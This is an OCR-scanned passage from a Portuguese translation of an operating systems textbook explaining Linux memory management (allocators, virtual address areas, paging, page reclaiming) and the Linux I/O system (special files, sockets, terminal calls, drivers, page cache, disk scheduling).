viço de núcleo kmalloc, que aloca regiões da memória 
fisicamente contíguas no espaço de endereçamento do 
núcleo, é na realidade construído sobre a interface da 
cache de objetos e fatias descritos aqui. 

Um terceiro alocador de memória, vmalloc, também 
está disponível e é usado quando a memória solicitada 
precisa ser contígua somente no espaço virtual, não na 
memória física. Na prática, isso é verdade para a maior 
parte da memória solicitada. Uma exceção consiste em 
dispositivos, que vivem do outro lado do barramento de 


memória e da unidade de gerenciamento da memória 
e, portanto, não compreendem endereços virtuais. No 
entanto, o uso de vmalloc resulta em alguma degradação 
de desempenho, e é usado fundamentalmente para alo- 
car grandes quantidades de espaço de endereçamento 
virtual, como para inserir dinamicamente módulos de 
núcleo. Todos esses alocadores de memória são deriva- 
dos daqueles no System V. 


Representação do espaço de endereçamento virtual 


O espaço de endereçamento virtual é dividido em 
áreas ou regiões homogêneas, contíguas e alinhadas 
por páginas. Isto é, cada área consiste em uma sequên- 
cia de páginas consecutivas com a mesma proteção 
e propriedades de paginação. O segmento de texto e 
arquivos mapeados são exemplos de áreas (ver Figu- 
ra 10.13). Pode haver brechas no espaço de endereça- 
mento virtual entre as áreas. Qualquer referência de 
memória a uma brecha resulta em uma falta de página 
fatal. O tamanho da página é fixo, por exemplo, 4 KB 
para o Pentium e 8 KB para o Alpha. Começando com 
o Pentium, o suporte para quadros de páginas de 4 MB 
foi adicionado. Em arquiteturas de 64 bits recentes, o 
Linux pode dar suporte a páginas gigantes de 2 MB 
ou 1 GB cada. Além disso, em um modo PAE (Phy- 
sical Address Extension — Extensão de endereço fi- 
sico), que é usado em determinadas arquiteturas de 32 
bits para aumentar o espaço de endereçamento do pro- 
cesso para além de 4 GB, são suportados os tamanhos 
de páginas de 2 MB. 

Cada área é descrita no núcleo por uma entrada 
vm area struct. Todos os vm area structs para um 
processo estão ligados juntos em uma lista ordenada 
pelos endereços virtuais, de maneira que todas as pá- 
ginas podem ser encontradas. Quando a lista fica longa 
demais (mais de 32 entradas), é criada uma árvore para 
acelerar a sua busca. A entrada vm area struct lista 
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as propriedades da área. Essas propriedades incluem 
o modo de proteção (por exemplo, somente leitura ou 
leitura/escrita), se ela está fixada na memória (não pa- 
ginável), e em que direção ela cresce (para cima para 
segmentos de dados, para baixo para pilhas). 

O vm area struct também registra se a área é pri- 
vada para o processo ou é compartilhada com um ou 
mais processos. Após um fork, o Linux faz uma cópia 
da lista de área para o processo filho, mas configura o 
pai e o filho para apontarem para as mesmas tabelas 
de páginas. As áreas são marcadas como de leitura/ 
escrita, mas as páginas em si são marcadas como so- 
mente de leitura. Se qualquer um dos processos tenta 
escrever em uma página, ocorre uma falha de prote- 
ção e o núcleo vê que a área é logicamente passível 
de ser escrita, mas a página não, então ele dá ao pro- 
cesso uma cópia da página e a marca como de leitura/ 
escrita. É por esse mecanismo que a cópia na escrita é 
implementada. 

A vm area struct também registra se a área tem 
armazenamento de apoio no disco designado e, se 
afirmativo, onde. Segmentos de texto usam o binário 
executável como armazenamento de apoio e arquivos 
mapeados na memória usam o arquivo de disco como 
armazenamento de apoio. Outras áreas, como a pilha, 
não têm armazenamento de apoio designado até serem 
paginadas para fora. 

Um descritor de memória de nível superior, mm . 
struct, reúne informações sobre todas as áreas de 
memória virtual pertencente a um espaço de endere- 
çamento, informações sobre os diferentes segmentos 
(textos, dados, pilha), sobre os usuários que compar- 
tilham esse endereço, e assim por diante. Todos os 
elementos de vm area struct de um espaço de endere- 
çamento podem ser acessados através de seu descritor 
de memória de duas maneiras. Primeiro, eles são orga- 
nizados em listas encadeadas ordenadas por endereços 
de memória virtual. Essa maneira é útil quando todas 
as áreas de memória virtual precisam ser acessadas, ou 
quando o núcleo está procurando uma região da me- 
mória virtual de um tamanho específico. Além disso, 
as entradas vm area struct são organizadas em uma 
árvore “rubro-negra” binária, uma estrutura de dados 
otimizada para rápidas procuras. Esse método é usa- 
do quando uma memória virtual específica precisa ser 
acessada. Ao capacitar o acesso a elementos do espa- 
ço de endereçamento do processo através desses dois 
métodos, o Linux usa mais estado por processo, mas 
permite diferentes operações de núcleo para usar o mé- 
todo do acesso que for mais eficiente para a tarefa com 
que ele estiver lidando. 


10.4.4 Paginação no Linux 


Os primeiros sistemas UNIX contavam com um pro- 
cesso trocador (swapper) para mover processos intei- 
ros entre a memória e o disco sempre que nem todos 
os processos ativos pudessem se encaixar na memória 
física. O Linux, assim como outras versões modernas 
do UNIX, não move mais processos inteiros. A princi- 
pal unidade de gerenciamento de memória é uma pági- 
na, e quase todos os componentes de gerenciamento de 
memória operam em uma granularidade de páginas. O 
subsistema de troca também opera em granularidades de 
páginas e está estreitamente acoplado com o algoritmo 
de recuperação de quadros de páginas (page frame 
reclaiming algorithm), descrito mais tarde nesta seção. 

A ideia básica por trás da paginação no Linux é sim- 
ples: um processo não precisa estar todo na memória a 
fim de ser executado. Tudo o que realmente se exige é 
a estrutura do usuário e as tabelas de páginas. Se elas 
forem colocadas na memória, o processo é considerado 
“na memória” e pode ser escalonado para executar. As 
páginas do texto, dados e segmentos de pilha são trazi- 
dos dinamicamente, um de cada vez, à medida que são 
referenciados. Se a estrutura do usuário e a tabela de pá- 
gina não estiverem na memória, o processo não poderá 
ser executado até que o trocador as traga. 

A paginação é implementada em parte pelo núcleo 
e em parte por um novo processo chamado de daemon 
de paginação. O daemon de paginação é o processo 2 
(o processo 0 é o processo ocioso — tradicionalmente 
chamado de trocador, swapper — e o processo | é init, 
como mostrado na Figura 10.11). Como todos os dae- 
mons, o daemon de paginação executa periodicamente. 
Uma vez desperto, ele procura à sua volta para ver se há 
trabalho para fazer. Se ele vê que o número de páginas 
na lista de páginas da memória livres está baixo demais, 
ele começa a liberar mais. 

O Linux é um sistema que trabalha inteiramente por 
paginação por demanda, sem pré-paginação ou conceito 
de conjunto de trabalho (embora exista uma chamada 
na qual um usuário pode dar uma dica de que determi- 
nada página será necessária logo, na esperança de que 
ela esteja lá quando necessário). Segmentos de texto e 
arquivos mapeados são paginados para seus arquivos 
respectivos no disco. Tudo mais é paginado para a par- 
tição de paginação (se presente) ou um dos arquivos de 
paginação de comprimento fixo, chamados de área de 
troca. Os arquivos de paginação podem ser adiciona- 
dos e removidos dinamicamente, e cada um tem uma 
prioridade. A paginação para uma partição separada, 
acessada como um dispositivo bruto, é mais eficiente 


do que a paginação para um arquivo por diversas ra- 
zões. Primeiro, o mapeamento entre blocos de arquivos 
e blocos de disco não é necessário (poupa a leitura indi- 
reta de blocos pela E/S do disco). Segundo, as escritas 
físicas podem ser de qualquer tamanho, não apenas do 
tamanho do bloco do arquivo. Terceiro, uma página é 
sempre escrita contiguamente ao disco; com um arqui- 
vo de paginação, isso pode ou não acontecer. 

Páginas não são alocadas no dispositivo de pagina- 
ção ou partição até que elas sejam necessárias. Cada 
dispositivo começa com um mapa de bits dizendo quais 
páginas estão livres. Quando uma página sem arma- 
zenamento de apoio precisa ser jogada para fora da 
memória, é escolhida a partição de paginação de mais 
alta prioridade ou arquivo que ainda tem espaço e uma 
página é alocada para ela. Normalmente, a partição de 
paginação, se presente, tem uma prioridade mais alta do 
que qualquer arquivo de paginação. A tabela de páginas 
é atualizada para refletir que a página não está mais pre- 
sente na memória (por exemplo, o bit página não pre- 
sente é configurado) e a localização do disco é escrita na 
entrada da tabela de páginas. 


Algoritmo de recuperação de quadros de páginas 


A substituição de páginas funciona da seguinte for- 
ma: o Linux tenta manter algumas páginas livres de 
maneira que elas possam ser recuperadas conforme 
a necessidade. É claro, esse conjunto deve ser conti- 
nuamente reabastecido. O algoritmo de recuperação 
de quadros de páginas (page frame reclaiming algo- 
rithm — PFRA) realiza isso. 

Antes de tudo, o Linux distingue entre quatro tipos 
diferentes de páginas: não recuperáveis, trocáveis, sin- 
cronizáveis e descartáveis. Páginas não recuperáveis, 
que incluem páginas reservadas ou bloqueadas, pilhas 
do modo núcleo e afins, não podem ser paginadas para 
fora da memória. Páginas trocáveis devem ser escritas 
de volta para a área de troca ou na partição de paginação 
do disco antes que a página seja recuperada. Páginas 
sincronizáveis devem ser escritas de volta para o disco 
se elas forem marcadas como sujas. Por fim, páginas 
descartáveis podem ser recuperadas imediatamente. 

No momento da inicialização, init começa como 
um daemon de paginação, kswapd, para cada nodo de 
memória, e os configura para executar periodicamente. 
Cada vez que kswapd desperta, ele confere para ver se 
há páginas livres suficientes disponíveis, comparando 
as marcações baixa e alta com o uso de memória atual 
para cada zona de memória. Se houver memória sufi- 
ciente, ele volta a dormir, embora possa ser despertado 
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cedo se mais páginas subitamente forem necessárias. Se 
a memória disponível para qualquer uma das zonas cair 
um dia abaixo de um limiar, kswapd inicia o algoritmo 
de recuperação de quadros de páginas. Durante cada 
execução, apenas um determinado número de páginas 
alvo é recuperado, em geral um máximo de 32. Esse 
número é limitado para controlar a pressão sobre E/S 
(o número de escritas de disco criadas durante as opera- 
ções de PFRA). Tanto o número de páginas recuperadas 
quanto o número total de páginas escaneadas são pará- 
metros configuráveis. 

Cada vez que o FRPA executa, ele primeiro tenta 
recuperar páginas fáceis, então procede com as mais 
difíceis. Muitas pessoas colhem as frutas mais baixas 
primeiro também. Páginas descartáveis e não referen- 
ciadas podem ser recuperadas imediatamente moven- 
do-as para a lista de livres da zona. Em seguida, ele 
procura por páginas com armazenamento de apoio que 
não foram referenciadas recentemente, usando um algo- 
ritmo similar ao do relógio. Em seguida são as páginas 
compartilhadas que nenhum dos usuários parece estar 
usando muito. O desafio com as páginas compartilhadas 
é que, se uma entrada de página for recuperada, as ta- 
belas de páginas de todos os espaços de endereçamento 
originalmente compartilhando aquela página devem ser 
atualizadas de maneira síncrona. O Linux mantém es- 
truturas de dados eficientes semelhantes a árvores para 
encontrar facilmente todos os usuários de uma página 
compartilhada. Páginas ordinárias do usuário são procu- 
radas em seguida, e se escolhidas para serem expulsas, 
elas devem ser programadas para escrita na área de tro- 
ca. A agressividade da troca de páginas (swappiness) 
do sistema, isto é, o índice de páginas com armazena- 
mento de apoio em relação às páginas que precisam ser 
trocadas selecionadas durante PFRA, é um parâmetro 
ajustável do algoritmo. Por fim, se uma página for in- 
válida, estiver ausente da memória, for compartilhada, 
fixada na memória, ou estiver sendo usada para DMA, 
ela é pulada. 

O PFRA usa um algoritmo semelhante ao do relógio 
para selecionar páginas antigas para expulsão dentro de 
uma determinada categoria. No núcleo desse algoritmo, 
há um laço que varre as listas ativas e inativas de cada 
zona, tentando recuperar diferentes tipos de páginas, 
com diferentes urgências. O valor de urgência é passado 
como um parâmetro dizendo ao procedimento quanto 
esforço despender para recuperar algumas páginas. Em 
geral, isso significa quantas páginas inspecionar antes 
de desistir. 

Durante o PFRA, as páginas são movidas entre as lis- 
tas ativas e inativas na maneira descrita na Figura 10.18. 
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Para manter alguma heurística e tentar encontrar pági- 
nas que não foram referenciadas, sendo improvável que 
sejam necessárias em um futuro próximo, o PFRA man- 
tém duas flags por página: ativa/inativa e referenciada 
ou não. Essas duas flags codificam quatro estados, como 
mostrado na Figura 10.18. Durante a primeira varredura 
de um conjunto de páginas, PFRA primeiro limpa seus 
bits de referência. Se durante a segunda execução sobre 
a página ficar determinado que ela foi referenciada, ela 
é avançada para outro estado, do qual é menos provável 
que seja recuperada. De outra maneira, a página é mo- 
vida para um estado de onde ela tem uma probabilidade 
maior de ser expulsa. 

Páginas na lista inativa, que não foram referenciadas 
desde a última vez que foram inspecionadas, são as me- 
lhores candidatas para a expulsão. Elas são páginas com 
o PG active e o PG referenced configurados para zero 
na Figura 10.18. No entanto, se necessário, as páginas 
podem ser recuperadas mesmo que estiverem em alguns 
outros estados. As setas refill na Figura 10.18 ilustram 
esse fato. 

A razão de a PRFA manter páginas na lista inativa 
embora elas possam ter sido referenciadas é evitar si- 
tuações como a seguinte: considere um processo que 
faz acessos periódicos a diferentes páginas, com um pe- 
riodo de 1 hora. Uma página acessada desde o último 
laço terá sua flag de referência configurada. No entanto, 
como ela não será necessária novamente pela próxima 
hora, não há razão para não a considerar uma candidata 
a reivindicação. 

Um aspecto do sistema de gerenciamento de memó- 
ria que ainda não mencionamos é um segundo daemon, 
pdflush, na realidade um conjunto de threads de daemon 
de segundo plano. Os threads pdflush (1) despertam pe- 
riodicamente, em geral a cada 500 ms, para escrever 
de volta para o disco páginas sujas muito antigas, ou 


(2) são explicitamente despertas pelo núcleo quando os 
níveis de memória disponíveis caem abaixo de um de- 
terminado limiar, para escrever de volta para o disco 
páginas sujas da cache de páginas. Em modo laptop, a 
fim de conservar a vida da bateria, páginas sujas são es- 
critas para o disco sempre que threads pdflush são des- 
pertos. Páginas sujas também podem ser escritas para 
o disco em solicitações explícitas por sincronização, 
através de chamadas de sistema como sync, fsync ou 
fdatasync. Versões mais antigas do Linux usavam dois 
daemons separados: kupdate, para escrever de volta pá- 
ginas antigas, e bdflush, para escrever de volta páginas 
em condições de pouca memória. No núcleo 2.4, essa 
funcionalidade foi integrada nos threads pdflush. A es- 
colha de múltiplos threads foi feita a fim de esconder 
longas latências de disco. 


10.5 Entrada/saída no Linux 


O sistema de E/S no Linux é relativamente simples 
e o mesmo que em outros UNICES. Basicamente, todos 
os dispositivos de E/S são feitos para parecer arquivos 
e são acessados como tais com as mesmas chamadas 
de sistema read e write usadas para acessar todos os ar- 
quivos comuns. Em alguns casos, parâmetros de dispo- 
sitivos precisam ser configurados, e isso é feito com o 
uso de uma chamada de sistema especial. Estudaremos 
essas questões nas seções a seguir. 


10.5.1 Conceitos fundamentais 


Assim como todos os computadores, aqueles execu- 
tando com Linux têm dispositivos de E/S como discos, 
impressoras e redes conectados a eles. Alguma maneira 
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é necessária para permitir que esses programas acessem 
esses dispositivos. Embora várias soluções sejam possi- 
veis, a solução do Linux é integrar os dispositivos em 
um sistema de arquivos nos chamados arquivos espe- 
ciais. Cada dispositivo de E/S é associado a um nome de 
caminho, normalmente em /dev. Por exemplo, um dis- 
co pode ser /dev/hd1, uma impressora pode ser /dev/Ip, 
e a rede pode ser /dev/net. 

Esses arquivos especiais podem ser acessados da 
mesma maneira que quaisquer outros. Nenhum coman- 
do especial ou chamada de sistema é necessário. As 
chamadas de sistema usuais open, read e write funcio- 
narão bem. Por exemplo, o comando 


cp file /dev/lp 


copia file para a impressora, fazendo que ele seja im- 
presso (presumindo que o usuário tenha permissão para 
acessar /dev/lp). Programas podem abrir, ler e escrever 
arquivos especiais exatamente da mesma maneira que 
eles fazem com arquivos regulares. Na realidade, cp do 
exemplo não tem nem consciência de que está impri- 
mindo. Dessa maneira, nenhum mecanismo especial é 
necessário para fazer E/S. 

Arquivos especiais são divididos em duas catego- 
rias, bloco e caractere. Um arquivo especial de bloco é 
aquele que consiste em uma sequência de blocos nume- 
rados. A propriedade fundamental do arquivo especial 
de bloco é que cada em pode ser individualmente en- 
dereçado e acessado. Em outras palavras, um programa 
pode abrir um arquivo especial de bloco e ler, digamos, 
o bloco 124 sem primeiro ter de ler os blocos 0 a 123. 
Arquivos de blocos especiais são tipicamente usados 
para discos. 

Arquivos especiais de caracteres são normalmente 
usados para dispositivos que realizam a entrada ou sa- 
ida de um fluxo de caracteres. Teclados, impressoras, 
redes, mouses, plotters e a maioria dos outros disposi- 
tivos de E/S que aceitam ou produzem dados para as 
pessoas usam arquivos especiais de caracteres. Não é 
possível (ou mesmo significativo) buscar o bloco 124 
em um mouse. 

Associado com cada arquivo especial há um driver 
do dispositivo que lida com o dispositivo corresponden- 
te. Cada driver tem o que é chamado de um número 
de dispositivo principal, que serve para identificá-lo. 
Se um driver suporta múltiplos dispositivos, digamos, 
dois discos do mesmo tipo, cada disco tem um núme- 
ro de dispositivo secundário que o identifica. Juntos, 
os números de dispositivos principal e secundário es- 
pecificam unicamente cada dispositivo de E/S. Em al- 
guns casos, um único driver lida com dois dispositivos 
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relacionados de perto. Por exemplo, o driver correspon- 
dendo aos controles /dev/tty controlam tanto o teclado 
quanto a tela, muitas vezes pensados como um único 
dispositivo, o terminal. 

Embora a maioria dos arquivos especiais não possa 
ser acessada aleatoriamente, eles muitas vezes preci- 
sam ser controlados de uma maneira que os arquivos 
especiais de blocos não podem. Considere, por exem- 
plo, uma entrada digitada no teclado e exibida na tela. 
Quando um usuário comete um erro de digitação e quer 
apagar o último caractere digitado, ele pressiona al- 
guma tecla. Algumas pessoas preferem usar a tecla de 
backspace, e outras a DEL. Similarmente, para apagar 
a linha inteira recém-digitada, existem muitas conven- 
ções. Tradicionalmente @ era usado, mas com a disse- 
minação do e-mail (que usa @ dentro do endereço de 
e-mail), muitos sistemas adotaram CTRL-U ou algum 
outro caractere. Da mesma maneira, a fim de interrom- 
per o programa em execução, alguma tecla especial pre- 
cisa ser pressionada. Aqui, também, pessoas diferentes 
têm preferências diferentes. CTRL-C é uma escolha co- 
mum, mas não é universal. 

Em vez de fazer uma escolha e forçar a todos usá- 
-la, o Linux permite que todas essas funções especiais 
e muitas outras sejam customizadas pelo usuário. Uma 
chamada de sistema especial geralmente é fornecida 
para configurar essas opções. A chamada de sistema 
também lida com a expansão da tecla tab, habilitação 
e desabilitação do eco de caracteres, conversão entre 
retorno de carro e avanço de linha, e itens similares. A 
chamada de sistema não é permitida em arquivos regu- 
lares ou arquivos especiais de bloco. 


10.5.2 Transmissão em redes 


Outro exemplo de E/S é a transmissão em redes, 
como introduzida pelo UNIX de Berkeley e apro- 
veitada quase completamente pelo Linux. O concei- 
to fundamental no projeto de Berkeley é o soquete. 
Soquetes são análogos a caixas de correio e soquetes 
de telefones fixos nas paredes no sentido de que per- 
mitem que os usuários realizem uma interface com a 
rede, da mesma maneira que as caixas de correio per- 
mitem que as pessoas realizem uma interface com o 
sistema postal e os soquetes de telefones fixos nas pa- 
redes permitem que as pessoas conectem telefones ao 
sistema telefônico. A posição dos soquetes é mostrada 
na Figura 10.19. 

Soquetes podem ser criados e destruídos dinamica- 
mente. A criação de um soquete retorna um descritor de 
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e LR] O uso de soquetes na transmissão em redes. 
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arquivos, que é necessário para estabelecer uma cone- 
xão, ler e escrever dados, e liberar a conexão. 

Cada soquete suporta um tipo particular de transmis- 
são em redes, especificado quando o soquete é criado. 
Os tipos mais comuns são 


1. Fluxo confiável de bytes orientado à conexão. 
2. Fluxo confiável de pacotes orientado à conexão. 
3. Transmissão não confiável de pacotes. 


O primeiro tipo de soquete permite que dois proces- 
sos em diferentes máquinas estabeleçam o equivalente 
de um pipe entre eles. Bytes são bombeados para dentro 
em uma extremidade e saem na mesma ordem na outra. 
O sistema garante que todos os bytes enviados cheguem 
corretamente na mesma ordem que foram enviados. 

O segundo tipo é bastante similar ao primeiro, ex- 
ceto por preservar os limites dos pacotes. Se o emissor 
fizer cinco chamadas separadas para write, cada uma 
com 512 bytes, e o receptor pedir por 2.560 bytes, com 
um soquete tipo 1 todos os 2.560 bytes serão retorna- 
dos ao mesmo tempo. Com um soquete tipo 2, apenas 
512 bytes serão retornados. Mais quatro chamadas são 
necessárias para conseguir o resto. O terceiro tipo de 
soquete é usado para dar ao usuário acesso aos recursos 
de baixo nível da rede. Esse tipo é especialmente útil 
para aplicações em tempo real, e para aquelas situações 
nas quais o usuário quer implementar um esquema de 
tratamento de erros especializado. Pacotes podem ser 
perdidos ou reordenados pela rede. Não há garantias, 
como nos primeiros dois casos. A vantagem desse modo 
é um desempenho melhor, o que às vezes predomina 
sobre a confiabilidade (por exemplo, para transmissão 
multimídia, na qual a rapidez conta muito mais do que 
estar certo). 

Quando um soquete é criado, um dos parâmetros es- 
pecifica o protocolo a ser usado para ele. Para fluxos 


Processo de destino 


Espaço do usuário 


Espaço do núcleo 


Rede 


de bytes confiáveis, o protocolo mais popular é o TCP 
(Transmission Control Protocol — Protocolo de Con- 
trole de Transmissão). Para a transmissão orientada por 
pacotes não confiável, UDP (User Datagram Proto- 
col — Protocolo de datagrama do usuário) é a escolha 
usual. Ambos são executados sobre o IP (Internet Pro- 
tocol — Protocolo da Internet). Todos esses protocolos 
surgiram com o ARPANET do Departamento de Defesa 
dos Estados Unidos, e agora formam a base da internet. 
Não há um protocolo comum para fluxos de pacotes 
confiáveis. 

Antes que um soquete possa ser usado para a trans- 
missão em redes, ele deve ter um endereço ligado a ele. 
Esse endereço pode ser um de vários domínios de no- 
mes. O mais comum é o domínio de nomes da internet, 
que usa inteiros de 32 bits para nomear os pontos da 
rede na Versão 4 e inteiros de 128 bits na Versão 6 (a 
Versão 5 foi um sistema experimental que jamais che- 
gou a dar certo). 

Assim que os soquetes tiverem sido criados tanto 
nos computadores fonte quanto nos computadores de 
destino, uma conexão poderá ser estabelecida entre eles 
(para a comunicação orientada pela conexão). Uma par- 
te faz uma chamada de sistema listen em um soquete 
local, que cria um buffer e bloqueia até que os dados 
cheguem. A outra faz uma chamada de sistema connect, 
dando como parâmetros o descritor de arquivos para um 
soquete local e o endereço de um soquete remoto. Se a 
parte remota aceita a chamada, o sistema então estabe- 
lece uma conexão entre os soquetes. 

Uma vez que uma conexão tenha sido estabelecida, 
ela funciona de maneira análoga a um pipe. Um proces- 
so pode ler e escrever a partir dela usando o descritor de 
arquivos para seu soquete local. Quando a conexão não 
for mais necessária, ela poderá ser fechada do jeito de 
sempre, através de uma chamada de sistema close. 


10.5.3 Chamadas de sistema para entrada/saída 
no Linux 


Cada dispositivo de E/S em um sistema Linux ge- 
ralmente tem um arquivo especial associado com ele. 
A maior parte da E/S pode ser feita apenas usando o ar- 
quivo apropriado, eliminando assim a necessidade para 
chamadas de sistema especiais. Mesmo assim, às vezes 
há uma necessidade por algo que seja específico do dis- 
positivo. Antes do POSIX a maioria dos sistemas UNIX 
tinha uma chamada de sistema ioctl que realizava um 
grande número de ações específicas dos dispositivos em 
arquivos especiais. Com o passar dos anos, ela tornou- 
-se muito confusa. O POSIX arrumou-a dividindo suas 
funções em chamadas de funções separadas fundamen- 
talmente para dispositivos terminais. No Linux e sis- 
temas UNIX modernos, se cada uma é uma chamada 
de sistema separada, se elas compartilham uma única 
chamada de sistema, ou algo diferente, é dependente de 
implementação. 

As primeiras quatro chamadas listadas na Figura 
10.20 são usadas para estabelecer e obter a velocidade 
terminal. Chamadas diferentes são fornecidas para en- 
trada e saída, pois alguns modems operam em velocida- 
des diferentes. Por exemplo, antigos sistemas videotexto 
permitiam que as pessoas acessassem bancos de dados 
públicos com solicitações curtas de casa para o servidor 
a 75 bits/s com as respostas voltando a 1.200 bits/s. Esse 
padrão foi adotado em uma época em que 1.200 bits/s 
ida e volta era algo caro demais para o uso caseiro. Os 
tempos mudaram no mundo das transmissões em redes. 
Essa assimetria ainda persiste, com algumas companhias 
telefônicas oferecendo serviço de recepção de 20 Mbps 
e serviço de transmissão a 2 Mbps, muitas vezes sob o 
nome ADSL (Asymmetric Digital Subscriber Line — 
linha digital assimétrica de assinante). 

As últimas duas chamadas na lista são para configu- 
rar e ler de volta todos os caracteres especiais usados 
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para apagar caracteres e linhas, interromper processos 
e assim por diante. Além disso, eles habilitam e desabi- 
litam o eco, lidam com o controle de fluxo e realizam 
outras funções relacionadas. Chamadas de funções de 
E/S adicionais também existem, mas elas são de cer- 
ta maneira especializadas, então não vamos discuti-las 
mais. Além disso, ioctl ainda está disponível. 


10.5.4 Implementação de entrada/saída no Linux 


A E/S no Linux é implementada por uma coleção 
de drivers de dispositivos, um para cada tipo de dispo- 
sitivo. A função dos drivers é isolar o resto do sistema 
das idiossincrasias do hardware. Ao fornecer interfaces 
padrão entre os drivers e o resto do sistema operacional, 
a maior parte de sistema de E/S pode ser colocada na 
parte independente de máquina do núcleo. 

Quando o usuário acessa um arquivo especial, o 
sistema de arquivos determina os números de disposi- 
tivos maiores e menores pertencendo a ele e se ele é 
um arquivo de bloco especial ou um arquivo especial 
de caracteres. O número do dispositivo maior é usado 
para indexar em uma ou duas tabelas de espalhamento 
internas contendo estruturas de dados para dispositivos 
de bloco e de caracteres. A estrutura assim localizada 
contém ponteiros para os procedimentos para realizar 
uma chamada que abra, leia e escreva no dispositivo, e 
assim por diante. O número do dispositivo menor é pas- 
sado como um parâmetro. Adicionar um novo tipo de 
dispositivo para o Linux significa adicionar uma nova 
entrada para uma dessas tabelas, assim como fornecer 
os procedimentos correspondentes para lidar com as vá- 
rias operações no dispositivo. 

Algumas das operações que podem ser associadas 
com diferentes dispositivos de caracteres são mostra- 
das na Figura 10.21. Cada linha refere-se a um único 
dispositivo de E/S (isto é, um único driver). As co- 
lunas representam as funções que todos os drivers de 


leao] As principais chamadas POSIX para o gerenciamento de terminal. 





Chamada a função 


Descrição 





s = cfsetospeed(&termios, speed) 


Ajusta a velocidade de saída 





s = cfsetispeed(&termios, speed) 


s = cfgetospeed(&termios, speed) 


Ajusta a velocidade de entrada 


Obtém a velocidade de saída 





s = cígettispeed(&termios, speed) 


Obtém a velocidade de entrada 





s = tcsetattr(fd, opt, &termios) 


Ajusta os atributos 











s = tcgetattr(fd, &termios) 








Obtém os atributos 





534] | SISTEMAS OPERACIONAIS MODERNOS 


[FIGURA 10.21] Algumas das operações de arquivos para dispositivos de caracteres típicos. 









































Dispositivo Open Close Read Write loctl Outros 
Null null null null null null 
Memória null null mem. read mem. write null 
Teclado k open k close k read error k_ioctl 
Terminal tty_open tty_close tty_read tty_write tty_ioctl 
Impressora lp open Ip close error Ip write Ip joctl 








caracteres devem dar suporte. Também existem várias 
outras funções. Quando uma operação é realizada em 
um arquivo especial de caractere, o sistema indexa na 
tabela de espalhamento de dispositivos de caracteres 
para selecionar a estrutura apropriada, então chama a 
função correspondente para ter o trabalho realizado. 
Desse modo, cada uma das operações de arquivos con- 
tém um ponteiro para uma função contida no driver 
correspondente. 

Cada driver é dividido em duas partes, que fazem 
parte do núcleo do Linux e executam em modo núcleo. 
A metade de cima executa no contexto do chamador 
e faz a interface com o resto do Linux. A metade de 
baixo executa no contexto de núcleo e interage com o 
dispositivo. Drivers têm permissão para fazer chamadas 
para procedimentos de núcleo para alocação de memó- 
ria, gerenciamento de temporizador, controle de DMA 
e outras questões. O conjunto de funções do núcleo que 
pode ser chamado é definido em um documento deno- 
minado Interface Driver-Núcleo. A escrita de drivers 
do dispositivo para o Linux é abordada detalhadamente 
em Cooperstein (2009) e Corbet et al. (2009). 

O sistema de E/S é dividido em dois componentes 
maiores: o tratamento de arquivos especiais de blocos e 
o tratamento de arquivos especiais de caracteres. Exa- 
minaremos cada um desses componentes. 

O objetivo da parte do sistema que realiza E/S em 
arquivos especiais de blocos (por exemplo, discos) é 
minimizar o número de transferências que precisam ser 
feitas. Para alcançar esse objetivo, o Linux tem uma 
cache entre os drivers do disco e o sistema de arqui- 
vos, como ilustrado na Figura 10.22. Antes do núcleo 
2.2, o Linux mantinha caches de buffer e de páginas 
completamente separadas, de maneira que um arquivo 
residindo em um bloco de disco poderia ser armazenado 
em ambas as caches. Versões mais novas do Linux têm 
uma cache unificada. Uma camada de blocos genérica 
contém esses componentes juntos, realiza as traduções 
necessárias entre os setores de disco, blocos, buffers e 
páginas de dados e capacita as operações neles. 


A cache é uma tabela no núcleo para armazenamento 
de milhares dos blocos usados mais recentemente. 
Quando um bloco de um disco é necessário por qual- 
quer que seja a razão (i-nodo, diretório, ou dados), uma 
verificação é feita para ver se ele está na cache. Se ele 
estiver, o bloco é tirado dali e um acesso de disco é evi- 
tado, resultando em grandes melhorias no desempenho 
do sistema. 

Se o bloco não está na cache da página, ele é lido do 
disco e dali copiado para onde ele for necessário. Como 
a cache da página tem espaço somente para um número 
fixo de blocos, o algoritmo de substituição de páginas 
descrito na seção anterior é invocado. 

A cache da página funciona tanto para escritas como 
para leituras. Quando um programa escreve um bloco, 
ele vai à cache, não ao disco. O daemon pdflush enviará 
o bloco para o disco no caso de a cache crescer acima 
de um valor especificado. Além disso, para evitar que 
os blocos fiquem tempo demais na cache antes de serem 
escritos para o disco, todos os blocos sujos são escritos 
para o disco a cada 30 segundos. 

A fim de reduzir a latência de movimentos repeti- 
tivos da cabeça do disco, o Linux conta com um esca- 
lonador de E/S. O seu propósito é reordenar ou reunir 
solicitações de leitura/escrita para dispositivos de blo- 
co. Há muitas variantes de escalonadores, otimizados 
para diferentes tipos de cargas de trabalho. O escalona- 
dor Linux básico é baseado no escalonador do eleva- 
dor original do Linux. As operações do escalonador 
de elevador podem ser resumidas como a seguir: opera- 
ções de disco são organizadas em uma lista duplamente 
encadeada, ordenada pelo endereço do setor da solici- 
tação de disco. Novas solicitações são inseridas nessa 
lista de uma maneira ordenada. Isso evita movimentos 
de cabeça de disco repetidos com um alto custo. A lista 
de solicitações é subsequentemente fundida, de maneira 
que as operações adjacentes são emitidas via uma única 
solicitação de disco. O escalonador de elevador básico 
pode levar à inanição. Portanto, a versão revisada do 
escalonador de disco Linux inclui duas listas adicionais, 
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[FIGURA 10.22] O sistema de E/S do Linux mostrando em detalhes um sistema de arquivos. 
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mantendo as operações de leitura ou escrita ordenadas 
por seus prazos finais. Os prazos finais padrão são 0,5 s 
para leituras e 5 s para escritas. Se um prazo final defi- 
nido pelo sistema para a operação de escrita mais antiga 
estiver prestes a expirar, essa solicitação de escrita será 
servida antes de qualquer outra solicitação na lista prin- 
cipal duplamente encadeada. 

Além dos arquivos de disco regulares, há também 
arquivos especiais de blocos, também chamados de 
arquivos de blocos brutos. Esses arquivos permitem 
que os programas acessem o disco usando números 
de blocos absolutos, sem levar em consideração o 
sistema de arquivos. Eles são usados mais seguida- 
mente para atividades como paginação e manutenção 
do sistema. 

A interação com dispositivos de caracteres é sim- 
ples. Como os dispositivos de caracteres produzem ou 
consomem fluxos de caracteres, ou bytes de dados, o 
suporte para o acesso aleatório faz pouco sentido. Uma 
exceção é o uso de disciplinas de linhas. Uma disci- 
plina de linha pode ser associada com um dispositivo 
terminal, representado através da estrutura tty struct, e 
ele representa um interpretador para os dados trocados 
com o dispositivo terminal. Por exemplo, a edição de 
linhas locais pode ser feita (isto é, caracteres e linhas 
